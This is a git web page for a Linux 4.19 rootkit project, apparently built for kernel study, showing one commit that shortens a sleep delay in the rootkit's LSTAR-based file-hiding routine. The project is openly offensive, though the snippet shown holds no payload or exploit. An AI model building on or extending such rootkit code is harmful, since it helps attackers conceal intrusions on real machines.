linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit efc0e72c5de4465d7a2b3d2fcffebc3f9e8ee76e
parent 8e179427965a4d05e7d05bf306fa02ee857a3504
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Mon, 11 Jan 2021 00:06:50 +0100

Delay 10s->1s

Diffstat:
Msrc/filehide_lstar.c | 2+-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c @@ -80,7 +80,7 @@ unhide_files_lstar(void) enable_protection(); if ((atomic_read(&syscall64_count)) > 0) - msleep(10000); + msleep(1000); } }